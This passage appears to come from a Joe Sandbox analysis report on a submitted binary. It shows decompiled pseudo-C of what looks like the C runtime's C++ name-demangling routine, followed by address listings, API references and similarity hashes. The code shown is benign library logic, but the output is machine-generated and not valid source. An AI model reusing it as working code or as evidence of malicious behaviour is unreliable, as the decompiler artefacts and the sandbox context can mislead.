				_v48 = _v80;
				if(_v48 > 0x5f) {
					L73:
					E0095F350(_a4, 2);
					return _a4;
				}
				_t10 = _v48 + 0x966840; // 0x9660c905
				switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M00966824))) {
					case 0:
						 *0xb30640 =  *0xb30640 - 1;
						E0095F350(_a4, 1);
						return _a4;
					case 1:
						_t15 =  &_v44; // -39
						__ecx = _t15;
						__eax = E0095F3F0(_t15);
						__ecx = _a8 & 0x000000ff;
						__eflags = _a8 & 0x000000ff;
						if(__eflags == 0) {
							L11:
							__ecx =  *0xb30640; // 0x0
							_v84 = __ecx;
							_t29 =  &_v208; // -203
							__edx = _t29;
							__eax = E0096A1E0(__ebx, __edi, __esi, _t29, 0, 0);
							_t30 =  &_v12; // -7
							__ecx = _t30;
							__eax = _v84;
							 *0xb30640 = _v84;
							_t32 =  &_v12; // -7
							__ecx = _t32;
							__eax = E0096A560(_t32);
							__eflags = __eax;
							if(__eax == 0) {
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xb30640; // 0x0
								__ecx =  *(__eax + 0xffffffffffffffff);
								__eflags =  *(__eax + 0xffffffffffffffff) - 0x31;
								if( *(__eax + 0xffffffffffffffff) == 0x31) {
									_t34 =  &_v12; // -7
									__edx = _t34;
									_t35 =  &_v216; // -211
									_t35 = E0095FAD0(_t35, 0x7e, _t34);
									_t36 =  &_v12; // -7
									__ecx = _t36;
									__eax = E0095F820(_t36, __eax);
								}
							}
							_t37 =  &_v44; // -39
							__ecx = _t37;
							__eax = E0096A560(_t37);
							__eflags = __eax;
							if(__eax == 0) {
								_t38 =  &_v44; // -39
								__ecx = _t38;
								_t39 =  &_v12; // -7
								__ecx = _t39;
								__eax = E0095FD40(_t39, _t38);
							}
							_t40 =  &_v12; // -7
							__edx = _t40;
							__ecx = _a4;
							E0095F240(_a4, _t40) = _a4;
							return _a4;
						}
						_t17 =  &_v192; // -187
						__edx = _t17;
						__eax = E00968210(__ebx, __edi, __esi, __eflags, _t17);
						_t18 =  &_v200; // -195
						_t18 = E0095FAD0(_t18, 0x3c, _t18);
						_t19 =  &_v44; // -39
						__ecx = _t19;
						__eax = E0095FD40(_t19, __eax);
						_t20 =  &_v44; // -39
						__ecx = _t20;
						__eax = E00965990(_t20);
						__ecx = __al;
						__eflags = __al - 0x3e;
						if(__al == 0x3e) {
							_t21 =  &_v44; // -39
							__ecx = _t21;
							__eax = E0095FDE0(_t21, 0x20);
						}
						_t22 =  &_v44; // -39
						__ecx = _t22;
						__eax = E0095FDE0(_t22, 0x3e);
						__eflags = _a12;
						if(_a12 != 0) {
							__edx = _a12;
							 *_a12 = 1;
						}
						__eax =  *0xb30640; // 0x0
						__ecx =  *__eax;
						__eflags =  *__eax;
						if( *__eax != 0) {
							__eax =  *0xb30640; // 0x0
							__eax = __eax + 1;
							__eflags = __eax;
							 *0xb30640 = __eax;
							goto L11;
						} else {
							_t25 =  &_v44; // -39
							__edx = _t25;
							__ecx = _a4;
							E0095F240(_a4, _t25) = _a4;
							return _a4;
						}
					case 2:
						__eax = 1;
						__ecx = 0xffffffffffffffff;
						__edx =  *0xb30640; // 0x0
						__eax =  *(__edx + 0xffffffffffffffff);
						__ecx =  *(__edx + 0xffffffffffffffff) * 8 +  &M009D8838;
						_t46 =  &_v12; // -7
						__ecx = _t46;
						__eax = E0095F7E0(_t46,  *(__edx + 0xffffffffffffffff) * 8 +  &M009D8838);
						goto L74;
					case 3:
						L19:
						__edx = 1;
						__eax = 0xffffffffffffffff;
						__ecx =  *0xb30640; // 0x0
						__edx =  *(_t51 + 0xffffffffffffffff);
						__eax =  *(_t51 + 0xffffffffffffffff) * 8 +  &M009D8800;
						_t51 =  &_v12; // -7
						__ecx = _t51;
						__eax = E0095F7E0(_t51,  *(_t51 + 0xffffffffffffffff) * 8 +  &M009D8800);
						goto L74;
					case 4:
						_v60 = 1;
						goto L19;
					case 5:
						__ecx =  *0xb30640;
						__edx =  *( *0xb30640);
						_v88 =  *( *0xb30640);
						__eax =  *0xb30640; // 0x0
						 *0xb30640 = __eax;
						__ecx = _v88;
						_v52 = _v88;
						__eflags = _v52 - 0x5f;
						if(_v52 > 0x5f) {
							L71:
							__ecx = _a4;
							E0095F350(_a4, 2) = _a4;
							return _a4;
						}
						__edx = _v52;
						__eax =  *(_v52 + 0x9668d4) & 0x000000ff;
						switch( *((intOrPtr*)(( *(_v52 + 0x9668d4) & 0x000000ff) * 4 +  &M009668A0))) {
							case 0:
								 *0xb30640 =  *0xb30640 - 1;
								 *0xb30640 =  *0xb30640 - 1;
								__ecx = _a4;
								E0095F350(_a4, 1) = _a4;
								return _a4;
							case 1:
								__edx = 1;
								__eax = 0xffffffffffffffff;
								__ecx =  *0xb30640; // 0x0
								__edx =  *(_t65 + 0xffffffffffffffff);
								__eax = 0x9d8958 +  *(_t65 + 0xffffffffffffffff) * 8;
								_t65 =  &_v12; // -7
								__ecx = _t65;
								__eax = E0095F7E0(_t65, 0x9d8958 +  *(_t65 + 0xffffffffffffffff) * 8);
								goto L72;
							case 2:
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xb30640; // 0x0
								__ecx =  *(__eax + 0xffffffffffffffff);
								__edx = 0x9d8958 +  *(__eax + 0xffffffffffffffff) * 8;
								__ecx = _a4;
								__eax = _a4;
								return _a4;
							case 3:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xb30640; // 0x0
								__eax =  *(__edx + 0xffffffffffffffff);
								__ecx = 0x9d8958 +  *(__edx + 0xffffffffffffffff) * 8;
								_t74 =  &_v136; // -131
								__ecx = _t74;
								__eax = E0095F1F0(_t74, 0x9d8958 +  *(__edx + 0xffffffffffffffff) * 8);
								_t75 =  &_v136; // -131
								__ecx = _t75;
								__eax = E0096AB30(_t75);
								_t76 =  &_v136; // -131
								__edx = _t76;
								__ecx = _a4;
								E0095F240(_a4, _t76) = _a4;
								return _a4;
							case 4:
								__edx =  *0xb30640;
								__eax =  *( *0xb30640);
								_v120 =  *( *0xb30640);
								 *0xb30640 =  *0xb30640 + 1;
								 *0xb30640 =  *0xb30640 + 1;
								__edx = _v120;
								_v56 = _v120;
								__eflags = _v56;
								if(_v56 == 0) {
									 *0xb30640 =  *0xb30640 - 1;
									 *0xb30640 =  *0xb30640 - 1;
									__ecx = _a4;
									E0095F350(_a4, 1) = _a4;
									return _a4;
								}
								__eflags = _v56 - 0x30;
								if(_v56 == 0x30) {
									_push(0);
									__ecx =  &_v152;
									__eax = E00967F80(__ebx, __edi, __esi,  &_v152, 1);
									__ecx =  &_v152;
									__eax = E0096AAC0( &_v152);
									__edx =  &_v152;
									__ecx = _a4;
									E0095F240(_a4,  &_v152) = _a4;
									return _a4;
								}
								__ecx = _a4;
								E0095F350(_a4, 2) = _a4;
								return _a4;
							case 5:
								__edx = 1;
								__eax = 0xffffffffffffffff;
								__ecx =  *0xb30640;
								__edx =  *( *0xb30640 + 0xffffffffffffffff);
								__eax = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
								__ecx = _a4;
								E0095F1F0(_a4, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8) = _a4;
								return _a4;
							case 6:
								_push(1);
								 &_v144 = E00967F80(__ebx, __edi, __esi,  &_v144, 0);
								__ecx =  &_v144;
								__eax = E0096AAC0( &_v144);
								__ecx =  &_v144;
								__ecx = _a4;
								E0095F240(_a4,  &_v144) = _a4;
								return _a4;
							case 7:
								__ecx = 1;
								__edx = 0xffffffffffffffff;
								__eax =  *0xb30640;
								__ecx =  *( *0xb30640 + 0xffffffffffffffff);
								__edx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8) =  &_v224;
								__eax = E00965E80(__ebx, __edi, __esi,  &_v224, 0, 0);
								__ecx =  &_v36;
								__eax = E0095F820( &_v36, __eax);
								__ecx =  &_v36;
								__eax = E0096A560( &_v36);
								__eflags = __eax;
								if(__eax != 0) {
									L31:
									__ecx =  &_v36;
									__edx = _a4;
									__ecx =  &_v12;
									E0095FB70( &_v12, _a4,  &_v36) = _a4;
									return _a4;
								}
								__ecx =  &_v36;
								__eax = E0096A660( &_v36);
								__eflags = __eax;
								if(__eax == 0) {
									goto L31;
								}
								__ecx = _a4;
								E0095F350(_a4, 2) = _a4;
								return _a4;
							case 8:
								goto L72;
							case 9:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xb30640;
								__eax =  *( *0xb30640 + 0xffffffffffffffff);
								__ecx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								__eax = E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
								__edx = 1;
								__eax = 0;
								__ecx =  *0xb30640;
								__edx =  *__ecx;
								__eflags =  *__ecx;
								if( *__ecx != 0) {
									__ecx = 1;
									__edx = 0;
									__eax =  *0xb30640;
									__ecx =  *__eax;
									__ecx =  *__eax - 0x30;
									__eflags = __ecx;
									_v20 = __ecx;
									if(__ecx < 0) {
										L37:
										__ecx = _a4;
										E0095F350(_a4, 2) = _a4;
										return _a4;
									}
									__eflags = _v20 - 5;
									if(_v20 < 5) {
										__edx = _v20;
										__eax = 0x9d8c60 + _v20 * 8;
										__ecx =  &_v36;
										__eax = E0095F7E0( &_v36, 0x9d8c60 + _v20 * 8);
										__ecx =  *0xb30640;
										__edx =  *( *0xb30640);
										_v92 =  *( *0xb30640);
										 *0xb30640 =  *0xb30640 + 1;
										 *0xb30640 =  *0xb30640 + 1;
										__ecx = _v92;
										_v24 = _v92;
										_v24 = _v24 - 0x30;
										_v24 = _v24 - 0x30;
										__eflags = _v24 - 4;
										if(__eflags > 0) {
											 *0xb30640 =  *0xb30640 - 1;
											 *0xb30640 =  *0xb30640 - 1;
											__ecx = _a4;
											E0095F350(_a4, 1) = _a4;
											return _a4;
										}
										__eax = _v24;
										switch( *((intOrPtr*)(_v24 * 4 +  &M00966934))) {
											case 0:
												__ecx =  &_v184;
												__eax = E00964380(__ebx, __edi, __esi, __eflags,  &_v184, 0);
												__edx =  &_v232;
												__ecx =  &_v184;
												_v96 = E0095FBB0( &_v184,  &_v232, 0x20);
												__eax =  &_v12;
												__ecx =  &_v240;
												__ecx = _v96;
												_v100 = E0095FB70(_v96,  &_v240,  &_v12);
												__edx =  &_v36;
												__eax = _a4;
												__ecx = _v100;
												E0095FB70(_v100, _a4,  &_v36) = _a4;
												return _a4;
											case 1:
												__ecx =  &_v36;
												__edx =  &_v68;
												__ecx =  &_v12;
												E0095FB70( &_v12,  &_v68,  &_v36) =  &_v248;
												_v104 = E00967C80(__ebx, __edi, __esi,  &_v248);
												__ecx =  &_v256;
												__ecx = _v104;
												__eax = E0095FBB0(_v104,  &_v256, 0x2c);
												__ecx =  &_v68;
												__eax = E0095FD40( &_v68, __eax);
												__edx =  &_v264;
												_v108 = E00967C80(__ebx, __edi, __esi,  &_v264);
												__eax =  &_v272;
												__ecx = _v108;
												__eax = E0095FBB0(_v108,  &_v272, 0x2c);
												__ecx =  &_v68;
												__eax = E0095FD40( &_v68, __eax);
												__ecx =  &_v280;
												_v112 = E00967C80(__ebx, __edi, __esi,  &_v280);
												__edx =  &_v288;
												__ecx = _v112;
												__eax = E0095FBB0(_v112,  &_v288, 0x2c);
												__ecx =  &_v68;
												__eax =  &_v296;
												_v116 = E00964900(__ebx, __edi, __esi,  &_v296, 0);
												__ecx =  &_v304;
												__ecx = _v116;
												__eax = E0095FBB0(_v116,  &_v304, 0x29);
												__ecx =  &_v68;
												__eax = E0095FD40( &_v68, __eax);
												__edx = _a4;
												__ecx =  &_v68;
												E0095FBB0( &_v68, _a4, 0x27) = _a4;
												return _a4;
											case 2:
												__eax =  &_v36;
												__ecx = _a4;
												__ecx =  &_v12;
												E0095FB70( &_v12, _a4,  &_v36) = _a4;
												return _a4;
										}
									}
									goto L37;
								}
								__eax = _a4;
								__ecx =  &_v12;
								E0095FC30( &_v12, _a4, 1) = _a4;
								return _a4;
							case 0xa:
								__eax = 1;
								__ecx = 0xffffffffffffffff;
								__edx =  *0xb30640;
								__eax =  *( *0xb30640 + 0xffffffffffffffff);
								__ecx = 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
								__ecx =  &_v12;
								__eax = E0095F7E0( &_v12, 0x9d8920 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
								L72:
								L74:
								__eflags = _v60;
								if(_v60 == 0) {
									_t244 =  &_v12; // -7
									__ecx = _t244;
									__eax = E0096A560(_t244);
									__eflags = __eax;
									if(__eax == 0) {
										_v176 = E00960060("operator", 8);
										_v172 = __edx;
										_t247 =  &_v12; // -7
										__ecx = _t247;
										_t248 =  &_v176; // -171
										__edx = _t248;
										_t249 =  &_v328; // -323
										_t249 = E0095FAA0(_t249, _t248, _t247);
										_t250 =  &_v12; // -7
										__ecx = _t250;
										__eax = E0095F820(_t250, __eax);
									}
								} else {
									_t243 =  &_v12; // -7
									__ecx = _t243;
									__eax = E0096AB00(_t243);
								}
								_t251 =  &_v12; // -7
								__ecx = _t251;
								__ecx = _a4;
								E0095F240(_a4, _t251) = _a4;
								return _a4;
							case 0xb:
								__eax =  *0xb30640;
								__ecx =  *( *0xb30640);
								_v128 =  *( *0xb30640);
								 *0xb30640 =  *0xb30640 + 1;
								 *0xb30640 =  *0xb30640 + 1;
								__eax = _v128;
								_v28 = _v128;
								_v28 = _v28 - 0x41;
								_v28 = _v28 - 0x41;
								__eflags = _v28 - 0xd;
								if(_v28 > 0xd) {
									__ecx = _a4;
									E0095F350(_a4, 2) = _a4;
									return _a4;
								}
								__edx = _v28;
								switch( *((intOrPtr*)(_v28 * 4 +  &M00966948))) {
									case 0:
										__eax = 1;
										__ecx = 0xffffffffffffffff;
										__edx =  *0xb30640;
										__eax =  *( *0xb30640 + 0xffffffffffffffff);
										__ecx = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
										__ecx = _a4;
										E0095F1F0(_a4, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8) = _a4;
										return _a4;
									case 1:
										__edx = 1;
										__eax = 0xffffffffffffffff;
										__ecx =  *0xb30640;
										__edx =  *( *0xb30640 + 0xffffffffffffffff);
										__eax = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
										__ecx =  &_v76;
										__eax = E0095F1F0( &_v76, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
										__ecx =  *0xb30640;
										__edx =  *( *0xb30640);
										__eflags =  *( *0xb30640) - 0x3f;
										if(__eflags != 0) {
											__ecx =  &_v320;
											__eax = E00968180( &_v320);
											__ecx =  &_v76;
											__eax = E0095FD40( &_v76, __eax);
										} else {
											 &_v312 = E009644C0(__ebx, __edi, __esi, __eflags,  &_v312);
											__ecx =  &_v76;
											__eax = E0095FD40( &_v76, __eax);
											__ecx =  *0xb30640;
											__edx =  *( *0xb30640);
											__eflags =  *( *0xb30640) - 0x40;
											if( *( *0xb30640) == 0x40) {
												__eax =  *0xb30640;
												__eax =  *0xb30640 + 1;
												__eflags = __eax;
												 *0xb30640 = __eax;
											}
										}
										_v160 = E00960060("\'\'", 2);
										_v156 = __edx;
										__edx =  &_v160;
										__ecx =  &_v76;
										E0095FCA0( &_v76,  &_v160) =  &_v76;
										__ecx = _a4;
										E0095F240(_a4,  &_v76) = _a4;
										return _a4;
									case 2:
										__ecx = 1;
										__edx = 0xffffffffffffffff;
										__eflags = 0xffffffffffffffff;
										__eax =  *0xb30640;
										__ecx =  *( *0xb30640 + 0xffffffffffffffff);
										__edx = 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8;
										__ecx =  &_v168;
										__eax = E0095F1F0( &_v168, 0x9d89e8 +  *( *0xb30640 + 0xffffffffffffffff) * 8);
										while(1) {
											__eax =  *0xb30640;
											__ecx =  *( *0xb30640);
											__eflags =  *( *0xb30640);
											if( *( *0xb30640) == 0) {
												break;
											}
											__edx =  *0xb30640;
											__eax =  *( *0xb30640);
											__eflags =  *( *0xb30640) - 0x40;
											if( *( *0xb30640) == 0x40) {
												break;
											}
											__ecx =  *0xb30640;
											_v13 =  *( *0xb30640);
											 *0xb30640 =  *0xb30640 + 1;
											 *0xb30640 =  *0xb30640 + 1;
											__ecx = _v13 & 0x000000ff;
											__ecx =  &_v168;
											__eax = E0095FDE0( &_v168, _v13 & 0x000000ff);
										}
										__edx =  *0xb30640;
										__eax =  *( *0xb30640);
										__eflags =  *( *0xb30640) - 0x40;
										if( *( *0xb30640) == 0x40) {
											__ecx =  *0xb30640;
											__ecx =  *0xb30640 + 1;
											__eflags = __ecx;
											 *0xb30640 = __ecx;
										}
										__edx =  &_v168;
										__ecx = _a4;
										E0095F240(_a4,  &_v168) = _a4;
										return _a4;
									case 3:
										__eax =  *0xb30640;
										__ecx =  *( *0xb30640);
										_v124 =  *( *0xb30640);
										 *0xb30640 =  *0xb30640 + 1;
										 *0xb30640 =  *0xb30640 + 1;
										__eflags = _v124 - 0x32;
										if(_v124 != 0x32) {
											__ecx = _a4;
											E0095F350(_a4, 2) = _a4;
											return _a4;
										}
										_a4 = E00969D50(__ebx, __edi, __esi, _a4);
										__eax = _a4;
										return _a4;
								}
							case 0xc:
								goto L71;
						}
					case 6:
						goto L73;
				}
			}


























































                      0x00965e8c
                      0x00965e94
                      0x00965e99
                      0x00965ea0
                      0x00965ea7
                      0x00965eaf
                      0x00965eb2
                      0x00965ebb
                      0x00965ec4
                      0x00965ecb
                      0x009667a7
                      0x009667ac
                      0x00000000
                      0x009667b1
                      0x00965ed4
                      0x00965edb
                      0x00000000
                      0x00965eea
                      0x00965ef4
                      0x00000000
                      0x00000000
                      0x00965f01
                      0x00965f01
                      0x00965f04
                      0x00965f09
                      0x00965f0d
                      0x00965f0f
                      0x00965f9c
                      0x00965f9c
                      0x00965fa2
                      0x00965fa9
                      0x00965fa9
                      0x00965fb0
                      0x00965fb9
                      0x00965fb9
                      0x00965fc1
                      0x00965fc4
                      0x00965fc9
                      0x00965fc9
                      0x00965fcc
                      0x00965fd1
                      0x00965fd3
                      0x00965fd5
                      0x00965fda
                      0x00965fdd
                      0x00965fe2
                      0x00965fe6
                      0x00965fe9
                      0x00965feb
                      0x00965feb
                      0x00965ff1
                      0x00965ff8
                      0x00966001
                      0x00966001
                      0x00966004
                      0x00966004
                      0x00965fe9
                      0x00966009
                      0x00966009
                      0x0096600c
                      0x00966011
                      0x00966013
                      0x00966015
                      0x00966015
                      0x00966019
                      0x00966019
                      0x0096601c
                      0x0096601c
                      0x00966021
                      0x00966021
                      0x00966025
                      0x0096602d
                      0x00000000
                      0x0096602d
                      0x00965f15
                      0x00965f15
                      0x00965f1c
                      0x00965f27
                      0x00965f2e
                      0x00965f37
                      0x00965f37
                      0x00965f3a
                      0x00965f3f
                      0x00965f3f
                      0x00965f42
                      0x00965f47
                      0x00965f4a
                      0x00965f4d
                      0x00965f51
                      0x00965f51
                      0x00965f54
                      0x00965f54
                      0x00965f5b
                      0x00965f5b
                      0x00965f5e
                      0x00965f63
                      0x00965f67
                      0x00965f69
                      0x00965f6c
                      0x00965f6c
                      0x00965f6f
                      0x00965f74
                      0x00965f77
                      0x00965f79
                      0x00965f8f
                      0x00965f94
                      0x00965f94
                      0x00965f97
                      0x00000000
                      0x00965f7b
                      0x00965f7b
                      0x00965f7b
                      0x00965f7f
                      0x00965f87
                      0x00000000
                      0x00965f87
                      0x00000000
                      0x0096603a
                      0x0096603f
                      0x00966042
                      0x00966048
                      0x0096604c
                      0x00966054
                      0x00966054
                      0x00966057
                      0x00000000
                      0x00000000
                      0x00966068
                      0x00966068
                      0x0096606d
                      0x00966070
                      0x00966076
                      0x0096607a
                      0x00966082
                      0x00966082
                      0x00966085
                      0x00000000
                      0x00000000
                      0x00966061
                      0x00000000
                      0x00000000
                      0x0096608f
                      0x00966095
                      0x00966098
                      0x0096609b
                      0x009660a3
                      0x009660a8
                      0x009660ab
                      0x009660ae
                      0x009660b2
                      0x00966796
                      0x00966798
                      0x009667a0
                      0x00000000
                      0x009667a0
                      0x009660b8
                      0x009660bb
                      0x009660c2
                      0x00000000
                      0x009660cf
                      0x009660d2
                      0x009660da
                      0x009660e2
                      0x00000000
                      0x00000000
                      0x009660ea
                      0x009660ef
                      0x009660f2
                      0x009660f8
                      0x009660fc
                      0x00966104
                      0x00966104
                      0x00966107
                      0x00000000
                      0x00000000
                      0x00966111
                      0x00966116
                      0x00966119
                      0x0096611e
                      0x00966122
                      0x0096612a
                      0x00966132
                      0x00000000
                      0x00000000
                      0x0096613f
                      0x00966144
                      0x00966147
                      0x0096614d
                      0x00966151
                      0x00966159
                      0x00966159
                      0x0096615f
                      0x00966164
                      0x00966164
                      0x0096616a
                      0x0096616f
                      0x0096616f
                      0x00966176
                      0x0096617e
                      0x00000000
                      0x00000000
                      0x009664dd
                      0x009664e3
                      0x009664e6
                      0x009664ef
                      0x009664f2
                      0x009664f8
                      0x009664fb
                      0x009664fe
                      0x00966502
                      0x00966511
                      0x00966514
                      0x0096651b
                      0x00966523
                      0x00000000
                      0x00966523
                      0x00966504
                      0x00966508
                      0x0096652b
                      0x0096652f
                      0x00966536
                      0x0096653e
                      0x00966544
                      0x00966549
                      0x00966550
                      0x00966558
                      0x00000000
                      0x00966558
                      0x00966562
                      0x0096656a
                      0x00000000
                      0x00000000
                      0x009661c0
                      0x009661c5
                      0x009661c8
                      0x009661ce
                      0x009661d2
                      0x009661da
                      0x009661e2
                      0x00000000
                      0x00000000
                      0x0096618b
                      0x00966196
                      0x0096619e
                      0x009661a4
                      0x009661a9
                      0x009661b0
                      0x009661b8
                      0x00000000
                      0x00000000
                      0x009661ea
                      0x009661ef
                      0x009661f2
                      0x009661f7
                      0x009661fb
                      0x00966203
                      0x0096620f
                      0x00966216
                      0x0096621f
                      0x00966222
                      0x00966227
                      0x0096622a
                      0x0096622f
                      0x00966231
                      0x00966251
                      0x00966251
                      0x00966255
                      0x00966259
                      0x00966261
                      0x00000000
                      0x00966261
                      0x00966233
                      0x00966236
                      0x0096623b
                      0x0096623d
                      0x00000000
                      0x00000000
                      0x00966241
                      0x00966249
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00966273
                      0x00966278
                      0x0096627b
                      0x00966281
                      0x00966285
                      0x0096628d
                      0x00966290
                      0x00966295
                      0x0096629a
                      0x0096629d
                      0x009662a3
                      0x009662a7
                      0x009662a9
                      0x009662c1
                      0x009662c6
                      0x009662c9
                      0x009662ce
                      0x009662d2
                      0x009662d2
                      0x009662d5
                      0x009662d8
                      0x009662e0
                      0x009662e2
                      0x009662ea
                      0x00000000
                      0x009662ea
                      0x009662da
                      0x009662de
                      0x009662f2
                      0x009662f5
                      0x009662fd
                      0x00966300
                      0x00966305
                      0x0096630b
                      0x0096630e
                      0x00966316
                      0x00966319
                      0x0096631e
                      0x00966321
                      0x00966327
                      0x0096632a
                      0x0096632d
                      0x00966331
                      0x00966496
                      0x00966499
                      0x009664a1
                      0x009664a9
                      0x00000000
                      0x009664a9
                      0x00966337
                      0x0096633a
                      0x00000000
                      0x00966343
                      0x0096634a
                      0x00966354
                      0x0096635b
                      0x00966366
                      0x00966369
                      0x0096636d
                      0x00966374
                      0x0096637c
                      0x0096637f
                      0x00966383
                      0x00966387
                      0x0096638f
                      0x00000000
                      0x00000000
                      0x0096639c
                      0x009663a0
                      0x009663a4
                      0x009663ac
                      0x009663bb
                      0x009663c0
                      0x009663c7
                      0x009663ca
                      0x009663d0
                      0x009663d3
                      0x009663d8
                      0x009663e7
                      0x009663ec
                      0x009663f3
                      0x009663f6
                      0x009663fc
                      0x009663ff
                      0x00966404
                      0x00966413
                      0x00966418
                      0x0096641f
                      0x00966422
                      0x00966428
                      0x00966432
                      0x00966441
                      0x00966446
                      0x0096644d
                      0x00966450
                      0x00966456
                      0x00966459
                      0x00966460
                      0x00966464
                      0x0096646c
                      0x00000000
                      0x00000000
                      0x00966476
                      0x0096647a
                      0x0096647e
                      0x00966486
                      0x00000000
                      0x00000000
                      0x0096633a
                      0x00000000
                      0x009662de
                      0x009662ad
                      0x009662b1
                      0x009662b9
                      0x00000000
                      0x00000000
                      0x009664b6
                      0x009664bb
                      0x009664be
                      0x009664c4
                      0x009664c8
                      0x009664d0
                      0x009664d3
                      0x009667a5
                      0x009667b6
                      0x009667b6
                      0x009667ba
                      0x009667c6
                      0x009667c6
                      0x009667c9
                      0x009667ce
                      0x009667d0
                      0x009667e1
                      0x009667e7
                      0x009667ed
                      0x009667ed
                      0x009667f1
                      0x009667f1
                      0x009667f8
                      0x009667ff
                      0x00966808
                      0x00966808
                      0x0096680b
                      0x0096680b
                      0x009667bc
                      0x009667bc
                      0x009667bc
                      0x009667bf
                      0x009667bf
                      0x00966810
                      0x00966810
                      0x00966814
                      0x0096681c
                      0x00000000
                      0x00000000
                      0x00966577
                      0x0096657c
                      0x0096657f
                      0x00966588
                      0x0096658b
                      0x00966591
                      0x00966594
                      0x0096659a
                      0x0096659d
                      0x009665a0
                      0x009665a4
                      0x00966784
                      0x0096678c
                      0x00000000
                      0x0096678c
                      0x009665aa
                      0x009665ad
                      0x00000000
                      0x009665b4
                      0x009665b9
                      0x009665bc
                      0x009665c2
                      0x009665c6
                      0x009665ce
                      0x009665d6
                      0x00000000
                      0x00000000
                      0x009665de
                      0x009665e3
                      0x009665e6
                      0x009665ec
                      0x009665f0
                      0x009665f8
                      0x009665fb
                      0x00966600
                      0x00966606
                      0x00966609
                      0x0096660c
                      0x00966643
                      0x0096664a
                      0x00966653
                      0x00966656
                      0x0096660e
                      0x00966615
                      0x0096661e
                      0x00966621
                      0x00966626
                      0x0096662c
                      0x0096662f
                      0x00966632
                      0x00966634
                      0x00966639
                      0x00966639
                      0x0096663c
                      0x0096663c
                      0x00966641
                      0x0096666a
                      0x00966670
                      0x00966676
                      0x0096667d
                      0x00966685
                      0x00966689
                      0x00966691
                      0x00000000
                      0x00000000
                      0x0096669e
                      0x009666a3
                      0x009666a3
                      0x009666a6
                      0x009666ab
                      0x009666af
                      0x009666b7
                      0x009666bd
                      0x009666c2
                      0x009666c2
                      0x009666c7
                      0x009666ca
                      0x009666cc
                      0x00000000
                      0x00000000
                      0x009666ce
                      0x009666d4
                      0x009666d7
                      0x009666da
                      0x00000000
                      0x00000000
                      0x009666dc
                      0x009666e4
                      0x009666ec
                      0x009666ef
                      0x009666f4
                      0x009666f9
                      0x009666ff
                      0x009666ff
                      0x00966706
                      0x0096670c
                      0x0096670f
                      0x00966712
                      0x00966714
                      0x0096671a
                      0x0096671a
                      0x0096671d
                      0x0096671d
                      0x00966723
                      0x0096672a
                      0x00966732
                      0x00000000
                      0x00000000
                      0x0096673c
                      0x00966741
                      0x00966744
                      0x0096674d
                      0x00966750
                      0x00966756
                      0x0096675a
                      0x00966772
                      0x0096677a
                      0x00000000
                      0x0096677a
                      0x00966760
                      0x00966768
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965E8C
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965E94
                      • DName::DName.LIBVCRUNTIMED ref: 00965EF4
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00965F04
                      • operator+.LIBVCRUNTIMED ref: 00965F2E
                      • DName::operator+=.LIBCMTD ref: 00965F54
                      • DName::operator+=.LIBCMTD ref: 00965F5E
                      • Mailbox.LIBCMTD ref: 00965F82
                      • DName::DName.LIBVCRUNTIMED ref: 009660DD
                      • DName::DName.LIBVCRUNTIMED ref: 009667AC
                      • DName::setIsUDC.LIBCMTD ref: 009667BF
                      • DName::isEmpty.LIBCMTD ref: 009667C9
                      • operator+.LIBVCRUNTIMED ref: 009667FF
                      • Mailbox.LIBCMTD ref: 0096680B
                      • Mailbox.LIBCMTD ref: 00966817
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
                      • String ID: _$operator
                      • API String ID: 2065213285-3322683124
                      • Opcode ID: 23bb6f8888956ba4c618a3b3601bf24cfc1d3cdf8d93434c9950a3bbe578baba
                      • Instruction ID: d50bd39e6945baa591b2e3238b7add79a079259eb8af656a8d7149d48acf4e97
